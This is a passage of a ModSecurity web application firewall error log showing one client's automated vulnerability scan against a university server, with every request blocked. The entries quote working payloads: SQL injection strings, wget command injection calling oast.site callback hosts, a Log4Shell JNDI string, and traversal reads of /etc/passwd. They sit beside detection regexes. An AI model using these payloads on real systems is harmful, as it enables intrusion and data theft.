"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPmhKsAAAAV"]
[Tue Aug 29 11:30:29.394817 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAPPSvYAAAAd"]
[Tue Aug 29 11:30:30.431535 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAOIvUcAAAAM"]
[Tue Aug 29 11:30:30.515251 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAOH4TcAAAAH"]
[Tue Aug 29 11:30:32.658086 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAPmhLoAAAAV"]
[Tue Aug 29 11:30:33.543758 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAPDnxUAAAAP"]
[Tue Aug 29 11:30:34.314520 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgsry7dt4yioj1b.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPDnxsAAAAP"]
[Tue Aug 29 11:30:34.370930 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAANh1rkAAAAA"]
[Tue Aug 29 11:30:34.463711 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAO8754AAAAF"]
[Tue Aug 29 11:30:34.469739 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAO8754AAAAF"]
[Tue Aug 29 11:30:35.348534 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPXAmkAAAAi"]
[Tue Aug 29 11:30:35.872700 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPiBgcAAAAB"]
[Tue Aug 29 11:30:36.398740 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPv-E8AAAAM"]
[Tue Aug 29 11:30:37.363263 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPOhZcAAAAa"]
[Tue Aug 29 11:30:37.402608 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPv-FIAAAAM"]
[Tue Aug 29 11:30:37.583122 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPOhZkAAAAa"]
[Tue Aug 29 11:30:37.640373 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPMmBIAAAAY"]
[Tue Aug 29 11:30:39.368388 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAPpWd4AAAAI"]
[Tue Aug 29 11:30:39.432806 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPMmBYAAAAY"]
[Tue Aug 29 11:30:39.434782 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPMmBYAAAAY"]
[Tue Aug 29 11:30:41.828960 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10ccCo-f0AAAP05E0AAAAA"]
[Tue Aug 29 11:30:42.640073 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPyOFMAAAAR"]
[Tue Aug 29 11:30:43.307069 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPXApQAAAAi"]
[Tue Aug 29 11:30:43.399031 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgq7h1qywcnzyem.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPmhMoAAAAV"]
[Tue Aug 29 11:30:44.387590 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAOKNqAAAAAK"]
[Tue Aug 29 11:30:45.407516 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAN@4-oAAAAO"]
[Tue Aug 29 11:30:46.324560 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10dsCo-f0AAAPiBikAAAAB"]
[Tue Aug 29 11:30:47.381313 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAP05F4AAAAA"]
[Tue Aug 29 11:30:47.516299 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPxBUIAAAAS"]
[Tue Aug 29 11:30:47.565735 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAN@4-8AAAAO"]
[Tue Aug 29 11:30:48.305225 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPQkhYAAAAe"]
[Tue Aug 29 11:30:48.306154 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg1zu5mby4fdstx.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAOM4Y8AAAAU"]
[Tue Aug 29 11:30:50.332644 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAOOuZsAAAAW"]
[Tue Aug 29 11:30:50.436448 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOM4ZkAAAAU"]
